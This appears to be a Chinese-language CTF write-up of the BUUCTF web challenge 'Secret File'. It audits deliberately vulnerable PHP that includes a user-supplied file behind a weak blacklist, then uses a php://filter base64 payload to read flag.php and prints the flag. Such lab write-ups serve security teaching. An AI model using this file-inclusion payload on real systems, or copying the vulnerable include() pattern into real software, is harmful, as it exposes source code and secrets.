[极客大挑战 2019]Secret File

题目来源：buuctf

题目类型：web

涉及考点：代码审计

1. 题目让我们去找秘密，第一反应是检查源代码

发现一个Archive_room.php，点击看看：

出现了一个点击按钮，点击后如下：

除此之外没有别的线索了

2. 我们依据提示回到上一个页面抓包

发现了一个新的php，进去得到了如下代码：

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

3. 接下来就是代码审计了

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
//strstr()和stristr()都用于在一个较长的字符串中搜索指定的子字符串，
//并返回从该子字符串第一次出现的位置开始到字符串末尾的部分。
//两者区别在于前者对大小写敏感，后者对大小写不敏感
//即程序过滤了 ../ tp input data
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

发现没过滤掉flag，于是尝试file=flag.php：

又被摆了一道。。

突然想到前段时间学到的php伪协议，具体知识点见[ACTF2020 新生赛]Include

于是我们构造payload如下：

secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

得到flag.php源码的base64加密：

对其解密得到flag：

flag{75299d36-4549-4f2f-85b5-a9c05d06ecee}

日期：2023.7.20

作者：y0Zero